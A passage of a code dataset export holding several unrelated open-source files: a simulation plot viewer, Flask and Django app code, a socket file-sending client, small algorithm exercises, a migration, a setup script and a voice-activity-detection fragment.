self.d[self.d <= 11.] / 2., self.f[self.d <= 11.] * 1000., '--')\r\n self.ax2.set_title('pull-out force-displacement curve')\r\n\r\n self.ax3.cla()\r\n X = np.linspace(\r\n 0, self.time_stepper.L_x, self.time_stepper.n_e_x + 1)\r\n X_ip = np.repeat(X, 2)[1:-1]\r\n l_sf, = self.ax3.plot(X_ip, self.sf_record[-1, :])\r\n self.ax3.set_title('shear flow in the bond interface')\r\n\r\n self.ax4.cla()\r\n U = np.reshape(self.U_record[-1, :], (-1, 2)).T\r\n l_u0, = self.ax4.plot(X, U[0])\r\n l_u1, = self.ax4.plot(X, U[1])\r\n l_us, = self.ax4.plot(X, U[1] - U[0])\r\n self.ax4.set_title('displacement and slip')\r\n\r\n self.ax5.cla()\r\n l_eps0, = self.ax5.plot(X_ip, self.eps_record[-1][:, :, 0].flatten())\r\n l_eps1, = self.ax5.plot(X_ip, self.eps_record[-1][:, :, 2].flatten())\r\n self.ax5.set_title('strain')\r\n\r\n self.ax6.cla()\r\n l_sig0, = self.ax6.plot(X_ip, self.sig_record[-1][:, :, 0].flatten())\r\n l_sig1, = self.ax6.plot(X_ip, self.sig_record[-1][:, :, 2].flatten())\r\n self.ax6.set_title('stress')\r\n\r\n self.ax3.set_ylim(np.amin(self.sf_record), np.amax(self.sf_record))\r\n self.ax4.set_ylim(np.amin(self.U_record), np.amax(self.U_record))\r\n# self.ax5.set_ylim(\r\n# np.amin(self.eps_record[:, :, 0::2]), np.amax(self.eps_record[:, :,\r\n# 0::2]))\r\n self.ax6.set_ylim(np.amin(self.sig_record), np.amax(self.sig_record))\r\n\r\n time = Range(0.00, 1.00, value=1.00)\r\n\r\n @on_trait_change('time')\r\n def draw_t(self):\r\n idx = (np.abs(self.time - self.t_record)).argmin()\r\n n_dof = 2 * self.time_stepper.domain.n_active_elems + 1\r\n\r\n self.ax2.cla()\r\n l_po, = self.ax2.plot(self.U_record[:, n_dof], self.F_record[:, n_dof])\r\n marker_po, = self.ax2.plot(\r\n self.U_record[idx, n_dof], self.F_record[idx, n_dof], 'ro')\r\n self.ax2.plot(\r\n self.d[self.d <= 11.] / 2., self.f[self.d <= 11.] 
* 1000., '--')\r\n self.ax2.set_title('pull-out force-displacement curve')\r\n\r\n self.ax3.cla()\r\n X = np.linspace(\r\n 0, self.time_stepper.L_x, self.time_stepper.n_e_x + 1)\r\n X_ip = np.repeat(X, 2)[1:-1]\r\n l_sf, = self.ax3.plot(X_ip, self.sf_record[idx, :])\r\n self.ax3.set_title('shear flow in the bond interface')\r\n\r\n self.ax4.cla()\r\n U = np.reshape(self.U_record[idx, :], (-1, 2)).T\r\n l_u0, = self.ax4.plot(X, U[0])\r\n l_u1, = self.ax4.plot(X, U[1])\r\n l_us, = self.ax4.plot(X, U[1] - U[0])\r\n self.ax4.set_title('displacement and slip')\r\n\r\n self.ax5.cla()\r\n l_eps0, = self.ax5.plot(X_ip, self.eps_record[idx][:, :, 0].flatten())\r\n l_eps1, = self.ax5.plot(X_ip, self.eps_record[idx][:, :, 2].flatten())\r\n self.ax5.set_title('strain')\r\n\r\n self.ax6.cla()\r\n l_sig0, = self.ax6.plot(X_ip, self.sig_record[idx][:, :, 0].flatten())\r\n l_sig1, = self.ax6.plot(X_ip, self.sig_record[idx][:, :, 2].flatten())\r\n self.ax6.set_title('stress')\r\n\r\n self.ax3.set_ylim(np.amin(self.sf_record), np.amax(self.sf_record))\r\n self.ax4.set_ylim(np.amin(self.U_record), np.amax(self.U_record))\r\n# self.ax5.set_ylim(\r\n# np.amin(self.eps_record[:, :, 0::2]), np.amax(self.eps_record[:, :,\r\n# 0::2]))\r\n self.ax6.set_ylim(np.amin(self.sig_record), np.amax(self.sig_record))\r\n\r\n self.figure.canvas.draw()\r\n\r\n view = View(HSplit(Item('figure', editor=MPLFigureEditor(),\r\n dock='vertical', width=0.9, height=0.9),\r\n VGroup(Group(Item('K_bar'),\r\n Item('H_bar'),\r\n Item('E_b'),\r\n label='Hardening modulus', show_labels=True, show_border=True),\r\n Item('time'),\r\n Group(Item('mats_eval'),\r\n # Item('fets_eval'),\r\n Item('time_stepper'),\r\n Item('time_loop'),\r\n show_border=True),\r\n Item('update', show_label=False),\r\n ),\r\n show_labels=False),\r\n resizable=True,\r\n height=0.9, width=1.0,\r\n )\r\n\r\nif __name__ == '__main__':\r\n\r\n ts = TStepper(L_x=100.)\r\n n_dofs = ts.domain.n_dofs\r\n# d_array = np.array(\r\n# [0., 5910., 1440., 7877., 1542., 9869., 1338., 11964., 955., 13420.])\r\n# d_array = np.array(\r\n# [0., 5910., 1440.])\r\n d_array = np.array(\r\n [0., 1.04, 0.98, 2.01, 1.93, 3.02, 2.905, 4.03, 3.875, 5.5])\r\n\r\n dd_arr = np.abs(np.diff(d_array))\r\n x = np.hstack((0, np.cumsum(dd_arr) / sum(dd_arr)))\r\n tf = interp1d(x, d_array)\r\n\r\n ts.bc_list = [BCDof(var='u', dof=n_dofs - 2, value=0.0),\r\n BCDof(var='u', dof=n_dofs - 1, value=1., time_function=tf)]\r\n\r\n tl = TLoop(ts=ts, d_t=0.002)\r\n\r\n# U_record, F_record, sf_record, t_record, eps_record, sig_record = tl.eval()\r\n#\r\n# plt.plot(U_record[:, n_dofs - 1],\r\n# F_record[:, n_dofs - 1], 'k', alpha=0.5)\r\n# plt.xlabel('displacement')\r\n# plt.ylabel('force')\r\n# fpath = 'D:\\\\data\\\\pull_out\\\\all\\\\DPO-20cm-0-3300SBR-V3_R3_f.asc'\r\n# d, f = np.loadtxt(fpath, delimiter=';')\r\n# plt.plot(d[d <= 11.] / 2., f[d <= 11.] 
* 1000., 'k--')\r\n# plt.xlim(0,)\r\n# plt.ylim(0,)\r\n# plt.show()\r\n\r\n    window = Mainwindow(mats_eval=ts.mats_eval,\r\n                        time_stepper=ts,\r\n                        time_loop=tl)\r\n    window.draw()\r\n\r\n    window.configure_traits()\r\n","repo_name":"liyingxiong/scratch","sub_path":"scratch/calibration_unloading/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":9082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"35550674691","text":"import random as rd\nfrom time import clock\nimport sys\n\narr = [rd.randint(1,897) for i in range(12)]\n\ndef qsort(arr):\n    if not arr: return arr\n    left = [i for i in arr[1:] if i<=arr[0]]\n    right = [i for i in arr[1:] if i>arr[0]]\n    return qsort(left)+[arr[0]]+qsort(right)\n\ndef insertion(arr):\n    n = len(arr)\n    for i in range(n):\n        ind = i\n        for j in range(i,n):\n            if arr[j] List[Union[str, int]]: # convert the csv into a list of lists\r\n    i = 0\r\n    j = 0\r\n\r\n    csv_list = [[None for k in range(collumns)] for i in range(row)]\r\n    with open(csv_path, 'r') as csv: # read the csv file\r\n        kata = ''\r\n        while True:\r\n            huruf = csv.read(1) # read one character at a time\r\n            if huruf == \";\":\r\n                if kata.isdigit(): # check whether the string contains only digits\r\n                    kata = int(kata) # convert the string to an integer\r\n                csv_list[i][j] = kata # store it in the csv list\r\n                kata = ''\r\n                j += 1\r\n            elif huruf == \"\\n\": # when a new row starts / the current row is finished\r\n                if kata.isdigit():\r\n                    kata = int(kata)\r\n                csv_list[i][j] = kata\r\n                kata = ''\r\n                j = 0\r\n                i += 1\r\n            elif huruf == \"\": # when there is nothing left in the csv\r\n                if kata.isdigit():\r\n                    kata = int(kata)\r\n                csv_list[i][j] = kata\r\n                break\r\n            else:\r\n                kata += huruf # append the character to the word\r\n    return csv_list\r\n","repo_name":"akmalrmn/Tubes-Daspro","sub_path":"csvtolist.py","file_name":"csvtolist.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"7582712499","text":"import os\nimport ConfigParser\nimport logging\nimport logging.config\n\nfrom logging.handlers import RotatingFileHandler\n\nfrom flask import Flask\n\nfrom utils.utils import Utils\n\n# Create utils instance.\nutils = Utils()\n\ndef create_app():\n    ''' Create the Flask app.\n    '''\n    # Create the Flask app.\n    app = Flask(__name__)\n\n    # Load application configurations\n    load_config(app)\n\n    # Configure logging.\n    configure_logging(app)\n\n    # Register URL rules.\n    register_url_rules(app)\n\n    return app\n\n\ndef load_config(app):\n    ''' Reads the config file and loads configuration properties into the Flask app.\n    :param app: The Flask app object.\n    '''\n\n    # Get the path to the application directory, that's where the config file resides.\n    par_dir = os.path.join(__file__, os.pardir)\n    par_dir_abs_path = os.path.abspath(par_dir)\n    app_dir = os.path.dirname(par_dir_abs_path)\n\n    # Read config file\n    # FIXME: Use the \"common pattern\" described in \"Configuring from Files\": http://flask.pocoo.org/docs/config/\n    config = ConfigParser.RawConfigParser()\n    config_filepath = app_dir + '/config.cfg'\n    config.read(config_filepath)\n\n    # Set up config properties\n    app.config['SERVER_PORT'] = config.get('Application', 'SERVER_PORT')\n    app.config['BASE_PATH'] = config.get('Application', 'BASE_PATH')\n\n    app.config['API_GJAKOVA_PROCUREMENT'] = config.get('Api', 'API_GJAKOVA_PROCUREMENT')\n\n    # Logging path might be relative or starts from the root.\n    # If it's relative then
be sure to prepend the path with the application's root directory path.\n log_path = config.get('Logging', 'PATH')\n if log_path.startswith('/'):\n app.config['LOG_PATH'] = log_path\n else:\n app.config['LOG_PATH'] = app_dir + '/' + log_path\n\n app.config['LOG_LEVEL'] = config.get('Logging', 'LEVEL').upper()\n\n\ndef configure_logging(app):\n\n # Get the path of the log from the config\n log_path = app.config['LOG_PATH']\n\n # Get the level of logging from the config\n log_level = app.config['LOG_LEVEL']\n\n # If path directory doesn't exist, create it.\n log_dir = os.path.dirname(log_path)\n if not os.path.exists(log_dir):\n os.makedirs(log_dir)\n\n # Create formatter\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n # Create Log_Handler\n log_handler = RotatingFileHandler(log_path, maxBytes=250000, backupCount=5)\n\n # add formatter to log handler\n log_handler.setFormatter(formatter)\n\n # Get the level of the Debug and set it to the logger\n app.logger.setLevel(log_level)\n\n # Add the handlers to the logger\n app.logger.addHandler(log_handler)\n\n # Test if the logging is working by typing this string to a file.\n app.logger.info('Logging to: %s', log_path)\n\n\n# Views for JSON requests\nfrom views.json.budgettype import BudgetType\nfrom views.json.procurementtype import ProcurementType\nfrom views.json.treemap import TreeMap\nfrom views.json.treemapprice import TreeMapPrice\nfrom views.json.vleracmimi import VleraCmimi\nfrom views.json.municipalityvleracmimi import MunicipalityVleraCmimi\nfrom views.json.redflags import RedFlagsJson\nfrom views.json.map import MapJson\nfrom views.json.company_dir_json import CompanyDirectory\nfrom views.json.company_details import CompanyDetails\n\n# Views for Page rendering\nfrom views.pages.index import Index\nfrom views.pages.distribution import Distribution\nfrom views.pages.typedistribution import TypeDistribution\nfrom views.pages.map import Map\nfrom views.pages.procurementdistribution import ProcurementDistribution\nfrom views.pages.municipalityPriceValue import MunicipalityPriceValue\nfrom views.pages.redflags import RedFlags\nfrom views.pages.company_dir_pages import CompanyDir\nfrom views.pages.company_details_page import CompanyDetailsPage\nfrom views.pages.about_page import AboutPage\n\n\n\ndef register_url_rules(app):\n ''' Register URLs\n :param app: The Flask application instance.\n '''\n # Register the URL rules for JSON requests.\n register_json_url_rules(app)\n\n # Register the URL rules for page requests.\n register_page_url_rules(app)\n\n\ndef register_json_url_rules(app):\n ''' Register the URL rules for JSON requests.\n :param app: The Flask application instance.\n '''\n app.add_url_rule(\n '/json/buxheti//',\n view_func=BudgetType.as_view('budget_type_json'))\n\n app.add_url_rule(\n '/json/buxheti/',\n view_func=BudgetType.as_view('budget_type_company_json'))\n\n app.add_url_rule(\n '/json/prokurimi//',\n view_func=ProcurementType.as_view('procurement_type_json'))\n\n\n app.add_url_rule(\n '/json/prokurimi/',\n view_func=ProcurementType.as_view('procurement_company_type_json'))\n\n app.add_url_rule(\n '/json/monthly-summary/',\n view_func=MunicipalityVleraCmimi.as_view('municipality_vlera_cmimi_json'))\n\n app.add_url_rule(\n '/json/monthly-summary//',\n view_func=VleraCmimi.as_view('vlera_cmimi_json'))\n\n app.add_url_rule(\n '/json/monthly-summary/',\n view_func=VleraCmimi.as_view('vlera_cmimi_json_company'))\n\n app.add_url_rule(\n '/json//map/',\n 
view_func=MapJson.as_view('map_view_json'))\n\n app.add_url_rule(\n '/json//red-flags/',\n view_func=RedFlagsJson.as_view('red_flags_json'))\n\n app.add_url_rule(\n '/json//red-flags//',\n view_func=RedFlagsJson.as_view('red_flags_json_selia'))\n\n # Get JSON for TreeMap\n app.add_url_rule(\n '/json//treemap/',\n view_func=TreeMap.as_view('treemap_json'))\n\n app.add_url_rule(\n '/json//treemap/price/',\n view_func=TreeMapPrice.as_view('treemap_price_json'))\n\n app.add_url_rule(\n '/json/kompanite/kerko/',\n view_func=CompanyDirectory.as_view('company_dir_json'))\n\n app.add_url_rule(\n '/json/kompanite/',\n view_func=CompanyDetails.as_view('company_details_json'))\n\n\ndef register_page_url_rules(app):\n ''' Register the URL rules for page requests.\n :param app: The Flask application instance.\n '''\n # Index.\n app.add_url_rule(\n '/',\n view_func=Index.as_view('index'))\n\n app.add_url_rule(\n '/kompanite',\n view_func=CompanyDir.as_view('company-directory'))\n\n #app.add_url_rule(\n # '/kompania/',\n # view_func=CompanyDetails.as_view('company_details'))\n\n app.add_url_rule(\n '//shperndarja',\n view_func=Distribution.as_view('distibution'))\n\n # Contract Distribution Amongst Companies\n app.add_url_rule(\n '//shperndarja/perfituesit',\n view_func=ProcurementDistribution.as_view('procurement_distribution'))\n\n # Budget/Procurement Type\n app.add_url_rule(\n '//shperndarja/',\n view_func=TypeDistribution.as_view('type_distribution'))\n\n # Map Page:\n app.add_url_rule(\n '//harta',\n view_func=Map.as_view('maps'))\n\n app.add_url_rule(\n '//red-flags',\n view_func=RedFlags.as_view('redflags'))\n\n app.add_url_rule(\n '/kompanite/',\n view_func=CompanyDetailsPage.as_view('company_details'))\n\n\n app.add_url_rule(\n '/krahasimi',\n view_func=MunicipalityPriceValue.as_view('municipality_price_value'))\n\n # About page:\n app.add_url_rule(\n '/per-projektin',\n view_func=AboutPage.as_view('about'))\n","repo_name":"opendatakosovo/e-prokurimi","sub_path":"gpv/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42712490528","text":"import numpy as np\nimport pandas as pd \nimport sys\n\npop = sys.argv[1]\nnumChannels = int(sys.argv[2])\nrho = float(sys.argv[3]) #ninth field in populations.txt\n\nto_data = '../sims/' + pop + '/'\nto_training_data = to_data + 'trainingData/'\n\n# load data\nfvecs = pd.read_csv(to_data + 'fvecs.tsv', header=None, sep='\\t')\nparams = pd.read_csv(to_data + 'params.tsv', header=None, sep='\\t')\nalpha_values = pd.read_csv(to_data + 'alpha_values.tsv', header=None, sep=' ')\n\n\nnumSims = alpha_values.shape[0]\nkeep_indices = [i for i in range(numSims) if np.max(alpha_values.values[i,:]) < 3.2e5]\nprint('number of indices to retain: ', len(alpha_values.values[keep_indices,1]))\nmean_alpha = np.mean(alpha_values.values[keep_indices,:].flatten())\nprint('mean alpha over rho: ', mean_alpha/rho)\n\n# from shape and scale params compute moments of alpha distributions\nparams.columns = ['shape', 'scale']\nmean = params.loc[keep_indices, 'shape']*params.loc[keep_indices, 'scale']\nstdev = np.sqrt(params.loc[keep_indices, 'shape'])*params.loc[keep_indices, 'scale']\n\n# log transform then standardize moments\nlogMean = np.log(mean)\nlogStDev = np.log(stdev)\nlogMoments = pd.DataFrame({'logMean':logMean, 'logStDev':logStDev})\nstandardizedLogMoments = (logMoments - logMoments.mean())/logMoments.std()\n\n# save moments for 
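un-standardizing predictions later (an inference from the file names; see the note below).\n# (Editor's illustrative note: a standardized prediction p maps back to the raw moments\n#  via np.exp(p * logSD + logM), using the center/scale arrays saved below; the name p\n#  is hypothetical and not part of this script.)\n# save moments for 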
output\nlogM = logMoments.mean().values\nlogSD = logMoments.std().values\nnp.save(to_training_data + 'center.npy', logM)\nnp.save(to_training_data + 'scale.npy', logSD)\n\n# turn fvecs into 4d tensor of image matrices\ndef get_images(fvecs, numSims):\n \"\"\"Takes data that has feature vectors\n on each row and returns them as 4d np array\n with dimension (numSims, numRows, numCols, numChannels)\"\"\"\n result = np.empty((numSims, 12, 25, numChannels))\n for j in range(numSims):\n for k in range(numChannels):\n result[j,:,:,k] = fvecs.iloc[[numChannels*j+k]].values.reshape(12,25)\n return(result)\n\n# save fvecs\nimages = get_images(fvecs, numSims)\nnp.save(to_training_data + 'fvecs.npy', images)\nnp.save(to_training_data + 'targets.npy', standardizedLogMoments)\n","repo_name":"mattlukac/alpha-inference","sub_path":"pipeline/2-save_training_data.py","file_name":"2-save_training_data.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36847426851","text":"from django.shortcuts import render, redirect\nfrom management.forms import UserCreateForm, ProfileEditForm, UserEditForm\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.contrib.auth import login, logout, authenticate\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\n\ndef signupuser(request):\n \"\"\"Create User\"\"\"\n if request.method == \"POST\":\n form = UserCreateForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n email = form.cleaned_data.get('email')\n first_name = form.cleaned_data.get('first_name')\n last_name = form.cleaned_data.get('last_name')\n password = form.cleaned_data.get('password')\n address = form.cleaned_data.get('address')\n website = form.cleaned_data.get('website')\n linked_in = form.cleaned_data.get('linked_in')\n instagram = form.cleaned_data.get('instagram')\n twitter = form.cleaned_data.get('twitter')\n message = messages.success(request, \n f'User has been created')\n return redirect('management:signupuser')\n else:\n form = UserCreateForm()\n return render(request, 'management/signupuser.html', {'form':form})\n\ndef loginuser(request):\n \"\"\"Login functionallity of the page\"\"\"\n if request.method == 'GET':\n return render(request, \n 'management/loginuser.html',\n {'form':AuthenticationForm()}\n )\n else:\n user = authenticate(request,\n username=request.POST['username'],\n password=request.POST['password']\n )\n if user is None:\n return render(request,\n 'management/loginuser.html',\n {'form':AuthenticationForm(),\n 'error':'Username or Password is incorrect'}\n )\n else:\n login(request, user)\n return redirect('management:home')\n \n@login_required \ndef logoutuser(request):\n \"\"\"Logout functionallity of the page\"\"\"\n if request.method == \"GET\":\n logout(request)\n message = messages.success(request, \n f'You are successfully logout!'\n )\n return render(request,\n 'management/logoutuser.html'\n )\n \n \ndef home(request):\n \"\"\"Show the Home page\"\"\"\n return render(request, 'management/home.html')\n\n\n@login_required\ndef myprofile(request):\n return render(request, 'management/myprofile.html')\n \n\n@login_required\ndef updateprofile(request):\n if request.method == \"POST\":\n u_form = UserEditForm(request.POST, instance=request.user)\n p_form = ProfileEditForm(request.POST, request.FILES, instance=request.user.profile)\n if u_form.is_valid() and 
p_form.is_valid():\n u_form.save()\n p_form.save()\n message = messages.success(request, f'Succesfully updated your profile')\n return redirect('management:myprofile')\n else:\n u_form = UserEditForm(instance=request.user)\n p_form = ProfileEditForm(instance=request.user.profile)\n context = {'u_form': u_form, 'p_form': p_form}\n \n return render(request, 'management/updateprofile.html', context)\n\n\n","repo_name":"ianmanalo1026/PhotoGallery","sub_path":"management/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"2360989405","text":"import os\nimport socket\nimport struct\nimport os\nimport json\n\nsk = socket.socket()\nsk.connect(('127.0.0.1', 9001))\n\nfilepath = '/pyBasic/网络编程总结及回顾/tcp协议发送大文件到服务端/3.并发部分的概念.mp4'\nfilesize = os.path.getsize(filepath)\nfilename = os.path.basename(filepath)\n\nfile_dic = {'filename':filename, 'filesize':filesize}\nfile_dic = json.dumps(file_dic).encode('utf-8')\nblen_dic = struct.pack('i', len(file_dic))\nsk.send(blen_dic)\nsk.send(file_dic)\n\nwith open(filepath, mode='rb') as f:\n while filesize >= 1024:\n content = f.read(1024)\n sk.send(content)\n filesize -= len(content)\n else:\n content = f.read()\n sk.send(content)\n","repo_name":"zhengew/xiaoBaiJuJia","sub_path":"pyBasic/网络编程总结及回顾/tcp协议发送小文件到服务端/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"33774376231","text":"def solution(array, commands):\n answer = []\n for com in commands:\n start, end, selected_idx = com\n selected_array = array[start-1:end]\n sorted_array = sorted(selected_array)\n answer.append(sorted_array[selected_idx-1])\n return answer\n\n\ntest_case = [\n [1, 5, 2, 6, 3, 7, 4], [[2, 5, 3], [4, 4, 1], [1, 7, 3]], [5, 6, 3]\n]\n\nres = solution(test_case[0], test_case[1])\nprint(\"------result------\")\nprint(res)\nif res == test_case[-1]:\n print(\"goood\")\nelse:\n print(\"fail \")\n","repo_name":"bearics/coding-test","sub_path":"pro-42748.py","file_name":"pro-42748.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41319933829","text":"\"\"\"empty message\n\nRevision ID: f3bdf790db9b\nRevises: f176760dc9f9\nCreate Date: 2020-05-28 13:12:37.028837\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'f3bdf790db9b'\ndown_revision = 'f176760dc9f9'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('Customer', 'stripe_customer_id')\n op.add_column('User', sa.Column('stripe_customer_id', sa.String(length=255), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
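###\n    # (Editor's illustrative note, not generated by Alembic: the downgrade below is\n    # roughly equivalent to the SQL\n    #   ALTER TABLE \"User\" DROP COLUMN stripe_customer_id;\n    #   ALTER TABLE \"Customer\" ADD COLUMN stripe_customer_id VARCHAR(255);\n    # exact syntax depends on the database dialect.)\n    # 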
###\n op.drop_column('User', 'stripe_customer_id')\n op.add_column('Customer', sa.Column('stripe_customer_id', sa.VARCHAR(length=255), autoincrement=False, nullable=True))\n # ### end Alembic commands ###\n","repo_name":"dragonmaster-alpha/Charity-App","sub_path":"pr412-my-charity-change-backend-python/migrations/versions/f3bdf790db9b_.py","file_name":"f3bdf790db9b_.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6152964044","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom kodos.version import VERSION\nfrom setuptools import setup\nfrom setuptools.command.build_ext import build_ext\nimport os\nimport sys\nfrom glob import glob\nimport subprocess\n\nargs = sys.argv[1:]\n\nif sys.platform == 'win32':\n# libpath = '.\\\\'\n libpath = r\"lib\\site-packages\\kodos\"\nelse:\n libpath = \"/usr/share/kodos\"\n\nfor arg in args:\n if arg == \"--formats=wininst\":\n libpath = \"kodos\"\n break\n\nHELP_DIR = os.path.join(libpath, \"help\")\nHELP_PY_DIR = os.path.join(libpath, \"help\", \"python\")\nIMAGES_DIR = os.path.join(libpath, \"images\")\nSCREENSHOTS_DIR = os.path.join(libpath, \"screenshots\")\nTRANSLATIONS_DIR = os.path.join(libpath, \"translations\")\n\nclass Build(build_ext):\n def run(self):\n subprocess.check_call(['make'])\n build_ext.run(self)\n\nsetup(name=\"kodos\",\n version=VERSION,\n description=\"Kodos is a visual regular expression editor\",\n author=\"Phil Schwartz\",\n author_email=\"phil_schwartz@users.sourceforge.net\",\n url=\"http://kodos.sourceforge.net\",\n entry_points={\n 'gui_scripts': ['kodos = kodos.py']\n },\n packages=['kodos'],\n data_files=[(HELP_DIR, glob(os.path.join(\"help\", \"*.*ml\"))),\n (HELP_PY_DIR, glob(os.path.join(\"help\", \"python\", \"*.html\"))),\n (IMAGES_DIR, glob(os.path.join(\"images\", \"*.png\"))),\n (SCREENSHOTS_DIR, glob(os.path.join(\"screenshots\", \"*.png\"))),\n (TRANSLATIONS_DIR, glob(os.path.join(\"translations\", \"*\"))),\n ],\n license=\"GPL\",\n long_description=\"\"\"\n Kodos is a visual regular expression editor and debugger.\n \"\"\",\n cmdclass={'build_ext': Build},\n )\n","repo_name":"majojoe/kodos","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"23922681712","text":"# Medium 285. Inorder Successor in BST\n# Given the root of a binary search tree and a node p in it, return the in-order successor of that node in the BST.\n# If the given node has no in-order successor in the tree, return null.\n# The successor of a node p is the node with the smallest key greater than p.val\n# !!! 
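(see the worked example below) !!!\n# Editor's illustrative trace for the test tree at the bottom of this file (5 with children 3(2,4) and 9):\n#   successor pairs: 9 -> None, 5 -> 9, 3 -> 4, 2 -> 3, 4 -> 5\n# (traced by hand from the code below; not asserted in the original file)\n# !!! 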
All Nodes will have unique values !!!\n\nclass TreeNode:\n    def __init__(self, val=0, left=None, right=None):\n        self.val, self.left, self.right = val, left, right\n\nclass Solution:\n    def inorderSuccessor(self, root, p):\n        if p.right: return self.to_leftmost(node=p.right)\n        return self.find_ancestor(root, p)\n\n    def find_ancestor(self, root, p):\n        curr, anc = root, None\n        while curr != p:\n            if p.val < curr.val: anc, curr = curr, curr.left\n            elif curr.val < p.val: curr = curr.right\n        return anc\n\n    def to_leftmost(self, node):\n        lm = node\n        while lm.left: lm = lm.left\n        return lm\n\n########## TEST ########################################################################################################\nsln = Solution()\nroot = TreeNode(5, TreeNode(3, TreeNode(2), TreeNode(4)), TreeNode(9))\nfor p in [root.right, root, root.left, root.left.left, root.left.right]:\n    res = sln.inorderSuccessor(root, p)\n    print(res.val if res else None)\n","repo_name":"Romzes/HappyLC","sub_path":"MainProject/Explore/Learn/17_BinarySearchTree_BST/2_Medium/InorderStep/00285_InorderSuccessor.py","file_name":"00285_InorderSuccessor.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"35064223348","text":"from collections import Counter,defaultdict\n\nclass Solution:\n    def countCharacters(self, words, chars):\n        if not words:\n            return 0\n        if not chars:\n            return sum(map(lambda s: len(s), words))\n        allowed_chars = Counter(list(chars))\n        total_len = 0\n        for word in words:\n            freq = defaultdict(int)\n            permit = True\n            for ch in word:\n                freq[ch] += 1\n                if ch not in allowed_chars or freq[ch] > allowed_chars[ch]:\n                    permit = False\n                    break\n            if permit:\n                total_len += len(word)\n        return total_len\n\n\nsol = Solution()\nprint(sol.countCharacters(words = [\"cat\",\"bt\",\"hat\",\"tree\"], chars = \"atach\"))\n\n","repo_name":"joestalker1/leetcode","sub_path":"src/main/scala/mock/05012020/CountCharacters.py","file_name":"CountCharacters.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"14244193626","text":"# Baekjoon 9020: Goldbach's conjecture\n# (fix: the original sieve = list(range(2, 10001)) indexed past the end and was offset by 2)\nsieve = list(range(10001))  # sieve[n] == n while n is still a prime candidate\nsieve[1] = 0\nfor i in range(2, 10001):\n    if sieve[i]:\n        for t in range(i+i, 10001, i):\n            if sieve[t]:\n                sieve[t] = 0\nsieve = [i for i in sieve if i]\nfor _ in range(int(input())):\n\ttmin, tmax = -1e9, 1e9\n\tn = int(input())\n\tfor i in range(2, n//2+1):\n\t\tif i in sieve:\n\t\t\tif n-i in sieve:\n\t\t\t\tif tmax-tmin > n-i - i:\n\t\t\t\t\ttmax, tmin = n-i, i\n\tprint(tmin, tmax)","repo_name":"VESOC/BOJ-Solutions","sub_path":"9020.py","file_name":"9020.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"38460819095","text":"# -*- coding: utf-8 -*-\r\n# Andrea Castiella Aguirrezabala\r\n# Voice activity detection (VAD) algorithm\r\n\r\nimport numpy as np\r\nimport statistics\r\nimport pyaudio\r\n\r\n# Voice detection\r\ndef VAD(frames):\r\n    speech = None\r\n    Energy_PrimThresh = 40\r\n    F_PrimThresh = 185\r\n    SF_PrimThresh = 5\r\n    silenceCount = 0\r\n    speechCount = 0\r\n\r\n    for frame in frames:\r\n        Ei = shortTermEnergy(frame)\r\n        Fi = dominantFrequency(frame)\r\n        SFMi = SFM(frame)\r\n\r\n        E_min = np.min(Ei)\r\n        F_min = np.min(Fi)\r\n        SF_min = np.min(SFMi)\r\n\r\n        Thresh_E = Energy_PrimThresh*np.log10(E_min)\r\n        Thresh_F = F_PrimThresh\r\n        Thresh_SF = SF_PrimThresh\r\n\r\n        count = 
